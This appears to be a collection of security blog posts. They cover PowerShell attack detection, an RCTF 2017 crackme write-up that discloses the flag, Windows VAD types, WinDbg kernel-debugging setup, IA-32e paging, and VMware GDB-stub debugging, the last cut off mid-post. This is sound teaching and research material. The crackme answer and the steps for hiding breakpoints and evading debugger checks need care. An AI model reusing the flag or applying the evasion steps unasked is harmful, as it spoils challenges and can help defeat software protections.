For years, I did my part in developing unique offensive capabilities in PowerShell to the approval of many in the community and to the disappointment of defenders and employees of Microsoft. At the time, their disappointment and frustration was justified to an extent. When I started writing offensive PowerShell code, v3 hadn’t been released so the level of detection was laughable. Fast forward to now – PowerShell v5 (which is available downlevel to Windows 7). I challenge anyone to identify a single language – scripting, interpreted, compiled, or otherwise that has better logging than PowerShell v5. Additionally, if defenders choose to employ whitelisting to enforce trusted PowerShell code, both AppLocker and Device Guard do what many still (mistakenly) believe the execution policy was intended to do – actually perform signature enforcement of PowerShell code.

While PowerShell has become extremely popular amongst pentesters, red-teamer, criminals, and state-sponsored actors, let’s not forget that we’re still getting compromised by compiled payloads every... freaking... day. PowerShell really is just a means to an end in achieving an attacker’s objective - now at the cost of generating significant noise with the logging offered by PowerShell v5. PowerShell obviously offers many distinct advantages for attackers that I highlighted years ago but defenders and security vendors are slowly but surely catching up with detecting PowerShell attacks. Additionally, with the introduction of AMSI, for all of its flaws, we now have AV engines that can scan arbitrary buffers in memory.

So in the context of offense, this is why I say that PowerShell really isn’t special. Defenders truly are armed with the tools they need to detect and mitigate against PowerShell attacks. So the next time you find yourself worrying about PowerShell attacks, make sure you’re worrying equally, if not more about every other kind of payload that could execute on your system. Don’t be naïve, however, and write PowerShell off as a “solved problem.” There will always continue to be innovative bypass/evasion research in the PowerShell space. Let’s continue to bring this to the public’s attention and the community will continue to benefit from the fruits of offensive and defensive research.

References for securing/monitoring PowerShell:

RCTF 2017 - Crackme 714 pts Writeup


Crackme 714 pts (9 solves) :


Please submit the flag like RCTF{flag}
Binary download : here

The crackme is an MFC application :

 

We can locate the routine of interest by setting a breakpoint on GetWindowTextW. Keep in mind that the input is in Unicode.
Later on, we find that the program generates two distinct blocks of values. These are generated from hard-coded values independently from the user input, so they're always the same. We call the first one : static_block1 and the second static_block2.
Then, there's the call to the encrypt function which takes static_block1 as an argument.
 
The encrypted block will then be XORed with static_block2.
We also find a reference to the encrypted valid key here, which we can extract easily during runtime :

 
The loop above performs a double-word by double-word comparison of the encrypted user input with the encrypted valid key that already came with the crackme.

In order to solve the challenge we need to reverse engineer the encrypt function and do the exact reverse. We also don't have to forget the XOR that is done with static_block2. For that matter, we supply to the decrypt function (the one we need to write) encrypted_valid_key XOR static_block2.

The script below has my implementation of the decrypt function, it outputs the key to flag.txt :

All we need to do now, is provide the decrypted key and the flag will be displayed.

The flag is : RCTF{rtf2017crackmebyw31y1l1n9}

See you again soon
Follow me on Twitter : here

Exploring Virtual Address Descriptors under Windows 10

This blog post is about my personal attempt to superficially list VAD types under Windows 10. It all started when I was wondering, out of sheer curiosity, if there's any way to determine the VAD type (MMVAD_SHORT or MMVAD) other than by looking at the pool tag preceding the structure. In order to do that, I had to list all VAD types, do some reverse engineering, and then draw a table describing what I've been able to find.
You can view the full document by clicking here 



From the table above it is possible to deduce the VAD structure type from both the VadType and PrivateMemory flags.

VadType flag
PrivateMemory flag
Type
0
0
MMVAD
0
1
MMVAD_SHORT
1
1
MMVAD
2
0
MMVAD
3
1
MMVAD_ENCLAVE

To test it out, I wrote a kernel driver that prints the deduced VAD type for each node of calc.exe. It also prints the pool tag so we can check the result.


And that's all for this article.
You can follow me on Twitter : here

Setting up kernel debugging using WinDbg and VMware

By: Nemi
8 July 2017 at 02:29
Setting up WinDbg for kernel-mode debugging is a fairly trivial process, however, it's easy to miss (or incorrectly configure) a step causing you to waste precious time. 

In this post, I have written a tutorial that goes through the entire process of setting up WinDbg (and configuring symbol lookup) for kernel-mode debugging with VMware using a named pipe and a virtual serial connection

Serial port debugging was chosen for compatibility reasons. Other debugging modes like ethernet/network, while quicker, require special hardware (e.g. certain network interface cards are compatible and many are not) and are only supported on newer versions of Windows. 

Requirements

  • A copy of either VMware Workstation (free 30-day trial) or VMware Player (entirely free for non-commercial use) for Windows. I'll be using VMware Workstation 12.5.7 (build-5813279).
  • A Windows operating system installed on your host and guest (VM). These do not have to be the same versions of Windows, but should be running at least Windows XP or later. My host and guest OS are both running Windows x64 10.0.15063 (Version 1703).
    • A free copy of Windows 10 can be found here as long as the tool is run on a machine that has a valid Windows license (of any version). Follow the steps to create an ISO file. Use the ISO file to install the OS on the Virtual Machine (helpful documentation can be found on the VMware website and WikiHow).
  • WinDbg.
    • The latest and greatest version can be downloaded from this page (direct link). This requires installation through the Windows SDK, however, you can unselect all components except "Debugging Tools for Windows" if you do not plan on doing any software development. I'll be using WinDbg x64 10.0.15063.400.

Setting up symbols on your host

Microsoft provides stripped ("redacted") PDBs (commonly referred to as "symbols") for most of their software releases. This includes the kernel components that power the operating system. In order to leverage this very useful information, we'll need to setup WinDbg so it can access these resources. 
  1. Locate your WinDbg installation.
  • For most people, this will be located in the following directory:
    C:\Program Files (x86)\Windows Kits\10\Debuggers\x64
  • Right-click on the windbg.exe file and select "Create shortcut". This shortcut should be placed on the desktop or another convenient place.
  • Right-click on the shortcut that you just created. Select "Properties". In the "Shortcut" tab, you'll see a window similar to this:
  • Select the "Target:" text field and append a string of the following format:
    -y "srv*c:\symbols*https://msdl.microsoft.com/download/symbols"
    • The syntax of this command string is:
      srv*[local cache]*[private symbol server]*https://msdl.microsoft.com/download/symbols
    • This will download all available symbols, as necessary, from the Microsoft Symbol Server to your local symbol directory at c:\symbols. If you prefer to place your downloaded symbols somewhere else, choose another local path instead.
    • This command supports multiple symbol servers. For example, if you wish to pull symbols from a remote share, you can append to this path, e.g:
      srv*c:\symbols*\\mainserver\symbols*https://msdl.microsoft.com/download/symbols
    • Example of a fully qualified "Target:" text field:
      "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" -y "srv*c:\symbols*https://msdl.microsoft.com/download/symbols"
  • Save your shortcut changes by pushing 'OK'. Now that we've instructed WinDbg to pull symbol information from the Microsoft Symbol Server, let's test it to ensure that everything is working.
    • We pass the symbol path via a command line parameter to WinDbg for reliability reasons. We could have, alternatively, configured an environment variable, _NT_SYMBOL_PATH, to achieve the same functionality, but it's a less elegant solution.
  • Run the shortcut and a copy of the pre-installed application Notepad.
  • Select "File" then "Attach to a Process..." (or hit F6) in WinDbg. Scroll down all the way and select "notepad.exe" from your process list. Then hit 'OK'.
  • A "Command" window will appear. We'll use this to issue commands to WinDbg.
    • I like to expand my "Command" window so it takes up the full view in the debugger. You can do this by right clicking on the "Command" window title and selecting "Dock":
  • Let's try to load symbols for all the running modules (executable and DLLs). First, let's list what modules are currently loaded in our process by using the lm (list modules) command in the text box immediately to the right of ">". This is in the bottom left corner of the "Command" window:
    If your list looks different from mine, don't worry. Different versions of Windows and different versions of Notepad will have different modules loaded.
  • Next, let's force a symbol load of all modules within our process by executing .reload /f:
    • Pro-tip: WinDbg has a great manual. To access it, you can type the command .hh within the debugger (or select "Help" and then "Search" from the menu bar). Typing .hh search terms go here automatically runs a search for the user supplied argument.
    • .hh .reload documents the .reload command. In particular, it explains why the /f argument is supplied.
  • It may take WinDbg a few moments to load all symbol information. You can see the status of WinDbg in the bottom left corner (next to where commands are inserted). After WinDbg has loaded symbols, run the lm command again.
    • Pro-tip: If WinDbg stays "BUSY" for a long time, you can force it to stop its current task by pushing Ctrl+Break on your keyboard or by selecting "Debug" and then "Break" from the menu bar.
      As you can see, most modules now have a local symbol path listed to the right of their module name. It's very possible that there may be some modules that still do not have symbols loaded. These modules are most likely not distributed by Microsoft (e.g. 3rd party antivirus vendors).
  • For validation, go to the directory that you've setup for your local symbol cache, e.g. C:\symbols. If the folder contains data, you're set and can skip the troubleshooting step.
  • Troubleshooting

    Verbose output

    The easiest way to troubleshoot problems with symbol loading is to enable verbose output with the !sym noisy command:

    Next, issue the .reload /f command.

    In my example, it's easy to see that I mistyped the URL to the Microsoft Symbol Server in my shortcut's "Target:" field. After applying the right URL to my "Target:" field, I can restart WinDbg and try again. 

    The lazy fix

    WinDbg may be able to fix the problem for you automagically if you issue .symfix and then .reload /f. In this case, WinDbg will alter your symbol path to the Microsoft Symbol Server. Your downloaded symbols will be stored, locally, in WinDbg's current working directory (C:\Program Files (x86)\Windows Kits\10\Debuggers\x64) or C:\ProgramData\dbg.

    Setting up VMware on your host

    1. Select the VM you wish to enable kernel-mode debugging on within VMware.
      • VMs should be listed in the "Library" pane on the left of the GUI. If the "Library" pane is missing, you can restore it by selecting "View" then "Customize" and choosing "Library" (or hit F9).
      • If your VM is not listed in the "Library" pane, you can manually navigate to it's .vmx file via "File" and then "Open..." (or Control+O).
    2. Ensure that the VM is currently not running. If it's currently active, power it off via the menu bar: "VM" then "Power" then "Shut Down Guest" (or Ctrl+E).
    3. Select "Edit virtual machine settings". Ensure that you are on the "Hardware" tab.
    4. Select the "Add" button and choose "Serial Port" from the "Add Hardware Wizard". Hit "Next >".
    5. Ensure that the "Serial port" checkbox is targeting "Output to named pipe" and then hit "Next >".
    6. On the final screen, you should see similar settings to this. Make a note of the "Named pipe" field and then hit "Finish".
      • Ensure that your settings match those above. In particular, output to a "Named pipe" at \\.\pipe\com_1 and ensure that the first drop down box has "This end is the server" selected and the last drop down box has "The other end is a virtual machine" selected. Finally, make sure that you've selected "Connect at power on".
      • The com_1 substring can be changed to something else (e.g. kdebug), but it needs to be remembered and the exact name should be used within WinDbg too.
    7. The "Add Hardware Wizard" will now close and a new "Serial port" will be added to your "Hardware" tab. Ensure the "Yield CPU on poll" checkbox is selected in "Virtual Machine Settings". Make a note of the number to the right of "Serial Port" (if there is no number, it's assumed to be 1).
      In my example, my serial port is number 2.
      • The 'Printer' is using "Serial Port 1".

    In the guest (Virtual Machine) context

    For guests (VMs) running Windows Vista and later.

    1. Start the VM.
    2. After Windows is finished loading, run "Command Prompt" (Start+R > cmd.exe) as an Administrator.
      • In Windows 10, you can right-click on the Windows logo in the taskbar (bottom-left) and select "Command Prompt (Admin)".
    3. Input the following commands in this elevated prompt:
    • bcdedit /debug on
    • bcdedit /dbgsettings serial debugport:2 baudrate:115200
      • Make sure your debugport argument matches your serial port number from step 7 in the "Setting up VMware" section. My serial port number is 2 because my VM has a printer that is using serial port number 1.
      • Pro-tip: You can add the /noumex switch to the the dbgsettings command, e.g. bcdedit /dbgsettings serial debugport:2 baudrate:115200 /noumex. This avoids user mode exceptions from causing the system to break into the kernel debugger.
  • Now validate that the settings have been successfully applied:
    • bcdedit /dbgsettings
    • bcdedit
    You should see similar command prompt output to this:
  • Finally, shutdown Windows cleanly. You can do this via the traditional route (the start menu) or by executing the shutdown -s -t 0 command in command prompt.
  • For guests (VMs) running Windows XP.

    1. Start the VM.
    2. bcdedit does not exist on Windows XP. To enable kernel debugging, you must alter the boot.ini file. The easiest way to do this is by clicking on Start and then Run (Start+R). Enter C:\boot.ini as the argument and hit 'OK'.
      • You might have to change the drive letter (from C:\) if your operating system is installed on a different drive.
      • This file is hidden (and considered a protected operating system file). Therefore, it won't be displayed in Windows Explorer by default.
    3. Append the string /debug /debugport=COM2 /baudrate=115200 to the end of the first entry in the [operating systems] section.
      • Make sure your debugport argument matches your serial port number from step 7 in the "Setting up VMware" section. My serial port number is 2 (hence COM2) because my VM has a printer that is using serial port number 1.
    4. Save the boot.ini via "File" and then "Save" from the menu bar (or hit Control+S). Close the file.
    5. Finally, shutdown Windows cleanly via the traditional route (the start menu).

    Finalizing WinDbg on your host

    1. Open the shortcut to your WinDbg that you created in step 2 in the "Setting up symbols on your host" section.
    2. Click on "File" and then "Kernel Debug..." (or press Ctrl+K). Select the "COM" tab and use your settings from the previous sections. If you've been following the tutorial verbatim, you can just use these settings:
    3. Finally, hit 'OK' and launch your Virtual Machine. WinDbg should automatically establish a connection to VMware when Windows begins loading.
    4. Break into the debugger by pressing Ctrl+Break or by selecting "Debug" and then "Break" from the menu bar. At this point, the Virtual Machine will be in a suspended state (e.g. Windows will stop loading).
    5. Load your kernel symbols with a .reload /f command. Then list the loaded modules via lm. If you're having troubles loading symbols, review the "Setting up symbols on your host" section above and work through the "Troubleshooting" tips if all else fails.
    6. Congratulations. At this point you've successfully set up kernel debugging using WinDbg and VMware over a virtual serial connection.

    Extra special bonus stage

    Modifying the shortcut to start kernel debugging immediately

    Having to manually configure WinDbg each time for kernel debugging is a real pain. Luckily, there is a better way. 
    1. Right-click on the shortcut that you created for WinDbg. Select "Properties". In the "Shortcut" tab, you'll see a window similar to this:
    2. Append the following string to the "Target:" textbox:
      -k com:pipe,port=\\.\pipe\com_1,resets=0,reconnect
      • You might have to change the pipe name from com_1 to whatever you selected in step 6 in the "Setting up VMware on your host" section.
      • The final "Target:" argument should look similar to this:
        "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" -y "srv*c:\symbols*https://msdl.microsoft.com/download/symbols" -k com:pipe,port=\\.\pipe\com_1,resets=0,reconnect
    3. Hit 'OK' and you should be all set. Now when you run this shortcut of WinDbg, it will correctly configure your symbol path (without having to use yucky environment variables) and will automatically start kernel debugging the first active named pipe.

    Introduction to IA-32e hardware paging

    8 July 2017 at 02:51
    In this article, we explore the complexities and concepts behind Intel's 64-bit paging scheme, why we need paging in the first place, and some practical analysis of paging structures.

    Why do we need paging?

    In any application, whether it's a student's first program or a complicated operating system, instructions executed by the computer that involve memory use a virtual address. In fact, even when the CPU fetches the next instruction to execute, it uses a virtual address. A virtual address represents a specific location in the application's view of memory; however, it does not represent a location within physical RAM. Paging, or linear address translation, is the mechanism that converts a linear address accessible by the CPU to a physical address that the memory management unit (MMU) can use to access physical memory.

    Technically, a linear address and a virtual address are not the same. For the purposes of this article, though, we will consider them to be the same, since we do not need to consider segmentation. Older architectures would first need to convert a virtual address to a linear address using segmentation.



    Figure 1: An application with different parts of virtual memory mapping to different parts of physical memory.

    Paging modes

    In this article, we will focus on IA-32e 4-level paging (64-bit paging) on Intel architectures. It is worth noting, though, that there are other paging modes supported by Intel.

    There are three mechanisms which control paging and the currently enabled paging mode. The first is the PG flag (bit 31) in control register 0 (CR0). If this bit is set, paging is enabled on the processor. If this bit is not set, no paging is enabled. In the latter case, the virtual address and physical address are considered equivalent and no translation is necessary.

    If paging is enabled on the processor, then control register 4 (CR4) is checked for the Physical Address Extension (PAE) bit (bit 5) being set. If it is not, then 32-bit paging is used. If it is set, then the final condition that is checked is the Extended Feature Enable Register, or IA32_EFER MSR. If the Long Mode Enable (LME) bit (bit 8) of this register is not set, the processor is in PAE 36-bit paging mode. If the LME bit is set, the processor is in 4-level paging mode, which is the 64-bit mode that we plan to explore in this article. This mode translates 48-bit virtual addresses into 52-bit physical addresses, though because the virtual addresses are limited to 48-bits, the maximum addressable space is limited to 256TB.

    Paging structures

    Regardless of which paging mode is enabled, a series of paging structures are used to facilitate the translation from a virtual address to a physical address. The format and depth of these paging structures will depend on the paging mode chosen. Generally speaking, each entry in the paging structure is the size of a pointer and contains a series of control bits, as well as a page frame number.

    In our case, 64-bit mode structures are 4,096 bytes in size (the size of the smallest architecture page - we will touch more on that later), containing 512 entries each. Every entry is 8 bytes.



    Figure 2: A paging structure containing 512 pointer-size entries in 64-bit mode.

    The first paging structure is always located at the physical address specified in control register 3 (CR3). As an aside, this is also the only place that stores the fully qualified physical address to a paging structure - in all other cases, we need to multiply a page frame number by the size of a page to get the real physical address. Each entry within the paging structure will contain a page frame number which either references a child paging structure for that region of memory, or maps directly to a page of physical memory that the original virtual address translates to. Again, in both cases, the page frame number is simply an index of a physical page in memory, and needs to be multiplied by the size of a page to get a meaningful physical address. Each paging structure entry also describes the the different memory access protections that are applied to the memory region they describe - whether the code is writable, executable, etc - as well as some more interesting properties such as whether or not that specific structure has previously been used for a translation.

    While the nested paging structures are being walked, the translation can be considered complete either by identifying a page frame at the lowest level of paging structure or by an early termination caused by the configuration of a paging structure. For example, if a paging structure is marked as not present (bit 0 of the structure is not set) or if a reserved bit is set, the translation fails and the virtual address is considered invalid. Additionally, a paging structure can set its Page Size bit to indicate that it is the lowest paging structure for that region of memory, which we will touch more on later.



    Figure 3: Some paging structures may not map to a physical page because the virtual address range they represent is invalid.

    Anatomy of a virtual address

    Information is encoded in a virtual address that makes the translation to a physical address possible. In 64-bit mode, we use 4-level paging, which means that any given virtual address can be divided into 6 sections with 4 of them associated with the different paging structures.

    The different paging structures are as follows: a PML4 table (located in CR3), a Page Directory Pointer Table (PDPT), a Page Directory (PD), and a Page Table (PT). The figure below illustrates which bits of a given virtual address map to these different paging structures.

    A single entry in the PML4 table (a PML4E) can address up to 512GB of memory, while an entry in the PDPT (a PDPTE) can address 1GB (parent granularity divided by 512) of memory, and so on. This is how we get the granularity of the paging structures down to 4KB at the lowest level.



    Figure 4: The anatomy of a virtual address in 64-bit mode.

    In the example above, we see that the highest bits (bits 63-48) are reserved. We will talk more about these bits in a future article, but for the purposes of address translation they are not used.

    The next 9 bits (bits 47-39) are used to identify the index into the PML4 table that contains the entry (PML4E) that's next in our paging structure walk. For example, if these 9 bits evaluate to the number 16, then the 16th entry in the table (PML4[15]) is selected to be used for the address translation.

    Once we have the PML4E entry from the given index, we can use that entry to provide us the address of the start of the next paging structure to walk to. Here is an example of what a PML4E structure would look like in C++.


    Using the page frame number (PFN) member of the structure (in this case, it actually refers to the page frame where the next structure is located), we can now walk to the next structure in the hierarchy by multiplying that number by the size of a page (0x1000). The result of that multiplication is the physical address where the next paging structure is located. The PML4E points to a Page Directory Pointer Table (PDPT). We use the next 9 bits of our original virtual address (bits 38-30) to determine the index in the PDPT that we want to look at. At that index, we will find a PDPTE structure, like the one defined below.


    It's worth noting at this point that paging structures other than those in the PML4 table contain a Page Size (PS) bit (bit 7). If this bit is set, then the current entry represents the physical page. This means that page sizes as large as 1GB can be supported, if the associated PDPTE indicates that it is a 1GB page by setting the PS bit. Otherwise, 2MB pages can be supported if the PS bit is set in the PDE structure. Not all processors support the PS bit being set in a PDPTE; therefore, not all processors will support 1GB pages.

    Moving along in our example, we can assume that the PS bit is not set in the PDPTE that we just referenced. So, we will look at the page frame number of this structure and multiply by the page size again to get the physical address of the next paging structure root.



    Figure 5: Our walk so far, from the CR3 register, through the PML4 and PDPT structures.

    Using the PFN stored in the PDPTE structure, we're able to locate the Page Directory paging structure, which is next in the hierarchy. As before, we use the next 9 bits (bits 29-21) of the original virtual address to get the index into this structure where our entry of interest (a PDE, in this case) resides. The PDE structure is defined similarly to the previous structures, as shown below.


    Again, we can use the PFN member of this structure multiplied by the size of a page to locate the next, and final, paging structure that facilitates the translation - the Page Table. The next 9 bits (bits 20-12) of our original virtual address are the index into the Page Table where the associated entry (PTE) is located. This PTE structure is defined below, and once again has similar characteristics to its predecessors.


    The PFN member of this structure indicates the real page frame of the backing physical memory. Because our example went the full depth of the paging structures, the size of a page frame is 4KB, or 0x1000. Thus, in order to get the location in physical memory where the backing page begins, we multiply the page frame number from the PTE by 0x1000 as we had been doing previously. The remaining 12 bits (bits 11-0) of the original virtual address are the offset into the physical page where the actual data resides. Had our example not used the full depth of the paging structures, and had instead used 2MB page sizes (stopping at the Page Directory level), that PDE would have contained the page frame number of interest, and we would have multiplied that number by the size of a page frame, which in that case would be 2MB or 0x20000. We would then add the offset into the page, which would be the remaining bits (bits 20-0) of the original virtual address since we did not need to use the usual 9 bits for indexing into a Page Table structure.



    Figure 6: Here we have a full traversal of the paging structures from CR3 all the way to the final PTE. We use the PFN from the PTE to calculate the backing physical page.

    Practical exploration with WinDbg

    We can use WinDbg to explore what this structure hierarchy looks like in practice. Windows does some things differently (such as per-process CR3 to keep the virtual address spaces of processes separate) and there are certain complexities that we will cover in a future article, but we will choose a simple example that demonstrates what we've just learned. 

    Attach an instance of WinDbg as a kernel debugger to the virtual machine or physical box of your choice to get started. Check out this article for instructions on how to do so.

    Once we've broken in, use the lm command to list the modules that have been loaded by the current process.


    We'll use the image base of ntdll.dll as our example. It's located at 0x00000000`771d0000. We can view the memory at that virtual address by using db (or dX, where X is your desired format specifier).


    Here we can see the signature 'MZ' as we would expect from a DOS header. But where are these bytes located in physical memory? There are two ways we can find out.

    The first way is the hard way - we can get the value stored in CR3 which gives us the beginning of our PML4 paging structure, and begin our manual walk like we described above.


    This means that the start of our PML4 table is located at physical address 0x187000. We can take a look at the physical memory at that location using !dq (or !dX, again where X is the format specifier you want to use). We're aligning on a quad-word because the size of each entry in any paging structure in 64-bit mode is 8 bytes.


    Here we see that we have one PML4E structure, with 0x00700007`ddc82867 as the value. For a paging structure entry, we know that bits 47-12 represent the page frame number of the next paging structure. So we extract those bits to get 0x7ddc82, then multiply it by the size of a page frame on this architecture (4KB) to get a physical address of 0x00000007`ddc82000.

    If we navigate to that physical address, let's see what we get.


    Sure enough, there are two PDPTE entries (or potentially more, off-screen, since there can be up to 512 listed) here in this PDPT that we've walked to. In order to figure out which PDPTE we need to reference, we'd need to refer to the 9 bits in the original virtual address that map to the PDPT (bits 39-30), which in the case of our example works out to 0x1. That means we want the second entry of the PDPT structure, at index 1.

    We can extract the page frame number from that PDPTE entry using the same bits we used in the last example (bits 47-12), resulting in 0x7d96b8. Let's multiply that number by 4KB, and see what we've got at that physical address.

    You may be wondering at this point: what's going on? Why is there nothing in the PD structure that was referenced by our PDPTE? Remember, not all memory is valid and mapped, so the fact that we are seeing a bunch of zero-value PDE entries isn't a surprise. It just means that those regions of virtual memory aren't currently mapped to a physical page. In order to get to the PDE we care about, we need to take the next 9 bits of the original virtual address as we did before, this time getting a value of 0x1b8 after extracting the bits. That will get us the index into the PD structure where our PDE of interest is located. We can navigate to that memory location now, remembering to multiply the index by the size of a paging structure entry, which is 8 bytes.

    That gets us 0x67e00007`d96b9867 as our PDE value. Once again, we extract the bits that are relevant to the page frame number, and we come up with 0x7d96b9.

    We can repeat the steps we've taken previously to multiply that page frame number by 4KB, add the PT index using the next 9 bits of the original virtual address (0x1d0 in this case), then navigate to the correct physical address.

    We've gotten the value 0xe7d00007`d9cc0025 for our PTE entry. We're almost there! We just need to do the same steps we've been doing one more time - extract the PFN from that value (0x7d9cc0), multiply by the size of a page (0x1000), but this time, we need to add the page offset (bits 11-0) from our original virtual address to the result. This should get us to 0x00000007`d9cc0000 since our page offset in this example was actually zero. Let's look at the memory!



    There's the header, just like we expected. That's a cumbersome amount of work, though, and we don't want to have to be doing that manually every time we try to translate an address. Luckily, there's an easier way.

    WinDbg provides the !pte command to illustrate the entire walk down the paging structures and what each entry contains. It is important to note, though, that the addresses of the paging structures are converted to virtual addresses before being displayed, so they will look different from the physical addresses we extrapolated on our own, but they point to the same memory.


    You can see that WinDbg gives us the address of the paging structure used, what it contained, and the page frame number for each. You can verify that the PFN on the PXE (PML4E) entry matches up with what we calculated, too. The most important part of all of this information is the PFN that's within the lowermost entry, the PTE. In our case it's 0x7d9cc0.

    So, we can multiply that page frame number by 0x1000 to get 0x00000007`d9cc0000, and that should be the physical address of the DOS header of ntdll.dll! This checks out based on the manual calculations we did previously, but let's take a look again to make sure.


    And there it is! We can test this by editing the DOS header in WinDbg and seeing if those changes are reflected on the physical page.


    Let's check it out using the virtual address...


    ...and the physical address...


    And there you have it! We now know how to successfully walk the IA-32e paging structures to convert a virtual address into a physical address.

    Setup - VMM debugging using VMware's GDB stub and IDA Pro - Part 1

    By: Nemi
    10 July 2017 at 05:00
    Sometimes you'll run into a situation that you can't analyze with a traditional kernel debugger like WinDbg. An example of such is trying to troubleshoot the runtime logic of PatchGuard (Microsoft's Kernel Patch Protection). In situations like this, you need to bust out the heavy tools. VMware has built in support for remote debugging of virtual machines running inside it through a GDB stub. IDA Pro, the defacto disassembler that most reverse engineers have, includes a GDB debugger. Together these make for a very powerful combo.

    This article goes over how to setup VMware's GDB stub and how to connect to it using IDA Pro's GDB debugger.

    Requirements

    • A copy of VMware Workstation (free 30-day trial). I'll be using VMware Workstation 12.5.7 (build-5813279).
      • Unfortunately, VMware Player (entirely free for non-commercial use) does not expose the GDB stub interface.
      • You can use either the Linux or Windows build of VMware. I'll be using the 64-bit Windows build.
    • The IDA Pro application. I'm using IDA Pro x64 Version 6.95.160808.

    Optional, but preferred

    • A Windows operating system installed on your host and guest (VM). These do not have to be the same versions of Windows. My host and guest OS are both running Windows x64 10.0.15063 (Version 1703).
      • This can be any OS supported by VMware such as Ubuntu. 
      • The second part of this tutorial (loading kernel symbols) assumes you're running a Windows 64-bit VM (AMD64).

    Enabling the GDB stub within VMware

    1. Select the VM you wish to enable GDB stub debugging on within VMware.
      • VMs should be listed in the "Library" pane on the left of the GUI. If the "Library" pane is missing, you can restore it by selecting "View" then "Customize" and choosing "Library" (or hit F9).
    2. Ensure that the VM is currently not running. If it's currently active, power it off via the menu bar: "VM" then "Power" then "Shut Down Guest" (or Ctrl+E).
    3. Select "Edit virtual machine settings". Ensure that you are on the "Options" tab.
    4. Find the "Working directory" text field and copy the string to your clipboard. 'Cancel' out of the prompt.
    5. Go to the working directory.
    6. Right-click on the *.vmx file and "Open with" your favorite text editor. I'll be using Notepad++.
    7. Add one of the following lines to the end of the file, based on preference.
      • If your VM is 32-bit and you want to debug locally:
        debugStub.listen.guest32 = "TRUE"
      • If your VM is 64-bit and you want to debug locally:
        debugStub.listen.guest64 = "TRUE"
      • If your VM is 32-bit and you want to debug remotely:
        debugStub.listen.guest32.remote = "TRUE"
      • If your VM is 64-bit and you want to debug remotely:
        debugStub.listen.guest64.remote = "TRUE"
    8. The default port for the GDB stub is 8864 for 64-bit guests and 8832 for 32-bit guests. If you'd like to change what port the VMware GDB stub listens on (e.g. 55555), add one of the following lines to the file:
      • If your VM is 32-bit:
        debugStub.port.guest32 = "55555"
      • If your VM is 64-bit:
        debugStub.port.guest64 = "55555"
    9. If you want to start debugging immediately on BIOS load add one of the following lines to your file:
      • If your VM is 32-bit:
        monitor.debugOnStartGuest32 = "TRUE"
      • If your VM is 64-bit:
        monitor.debugOnStartGuest64 = "TRUE"
    10. To make it difficult to detect breakpoints that you've set using GDB, it's strongly recommended to add the following option too:
      • debugStub.hideBreakpoints = "TRUE"
      An important thing to note is that this option is restricted by the number of hardware breakpoints available to the processor (usually 4).
    11. Save the *.vmx file via "File" and then "Save" from the menu bar (or hit Control+S). Here's a copy of the contents of my *.vmx file:
      Close the file.
    12. Run the VM corresponding to the *.vmx file you just edited. Validate that the GDB stub is currently running by opening the vmware.log file in the same directory as the *.vmx file:
      If you see a message from "Debug stub" that tells you VMware is "listening" for a debug connection on a certain port number, you're in a good state.

      If you are missing that log line or have an error, ensure that your *.vmx file has the appropriate settings. Remember: you must edit the *.vmx file when the Virtual Machine is off or your changes may be lost.

    Configuring the GDB debugger within IDA Pro

    1. Launch the 64-bit version of IDA Pro if you're debugging a 64-bit VM and the 32-bit version of IDA Pro if you're debugging a 32-bit VM.
    2. Skip the "Welcome" dialog (by hitting "Go") and go to the main disassembler window. Choose "Debugger" and then "Attach" and finally "Remote GDB debugger" from the menu bar.
    3. Enter the appropriate "Hostname" and "Port". These were set up by you during steps 7 and 8 of the "Enabling the GDB stub within VMware" section. Furthermore, these can be validated in the vmware.log file (this was done in step 12 of the same section). Then hit "Debug options".
    4. In the "Debugger setup" window, select "Set specific options".
    5. Ensure that the right "Processor" is set in the drop down box. If you're debugging a 64-bit edition of Windows (AMD64), select "Intel x64". If you're debugging a 32-bit edition of Windows (X86), select "Intel x86".
      Select 'OK' in the "GDB configuration" window. And then select 'OK' in the "Debugger setup" window. Finally, select 'OK' in the "Debug application setup" window.
    6. The VM will become suspended and a green "play" button will appear. At this point, IDA should bring up a window with the title "Choose process to attach to".
      Select "<attach to the process started on target>" and hit 'OK'.
    7. If you see this window, that means you're almost done.
    8. Select "Debugger" and then "Manual memory regions" from the menu bar.
    9. Inside of the "Manual memory regions" tab, right click and select "Insert" (or just press "Insert" on your keyboard).
    10. A new window will pop up. Enter in the "Start address" as 0 and the "End address" as -2. Make sure the right "segment" is selected (e.g. 64-bit segment for 64-bit VM debugging) and hit 'OK'.
      • This essentially maps all virtual memory from 0 to 0xFFFFFFFFFFFFFFFE (on x64).
      • "-1" is not an acceptable boundary for IDA Pro as the "End address".
    11. Find the "General Registers" window and find the IP register (RIP on x64, EIP on x86).
      • If the "General Registers" window is gone, select "Debugger" and then "Debugger windows" and finally "General Registers" from the menu bar.
    12. Right click on the IP register and select "Jump" from the context menu that appears.
    13. Your memory view will become synched to the IP register. If there are raw bytes listed and not code, don't panic. Place your cursor on the address of the IP and hit "C".
    14. Congratulations. At this point you've successfully set up VMware's GDB stub and IDA Pro's GDB debugger. You are now able to debug the VM and apply breakpoints through the IDA Pro GUI just as you would normally through a kernel debugger. Most of the functionality of the GDB debugger can be accessed through the "Debugger" menu bar.
    • This type of debugging is transparent to the kernel and therefore "debugger" checks like "KdDebuggerEnabled" and "KdDebuggerNotPresent" will not trigger. Furthermore, if the debugStub.hideBreakpoints option was enabled, breakpoints (up until the hardware maximum) will not make any inline code edits!

    Final thoughts

    Ultimately, the GDB debugger is not very useful without kernel symbols being loaded. One option, albeit a naive one, is to attach WinDbg as a kernel debugger while running IDA's GDB stub in the background. A tutorial on how to setup kernel debugging using WinDbg and VMware can be found here. You are then able to use the symbolic data that is provided from WinDbg to power debugging in IDA's GDB debugger. This is very cumbersome and has many disadvantages such as not being able to avoid kernel debugger checks.

    Luckily, there is a better way. In the second part of this series, we'll discover how to load kernel symbols in IDA Pro's GDB debugger.

    Loading kernel symbols - VMM debugging using VMware's GDB stub and IDA Pro - Part 2

    By: Nemi
    10 July 2017 at 05:48
    This article assumes you've read the first part of the series. In particular, at this point you should have successfully setup VMware's GDB stub and IDA Pro's GDB debugger. You should now be in a connected state and broken into IDA Pro's debugger GUI.

    Furthermore, the focus of this post is going to be exclusively on loading kernel symbols for 64-bit editions of Windows (AMD64). Different operating systems (and different architectures of Windows) require slight modifications to the article's logic.

    Where's Waldo ntoskrnl?

    The end goal

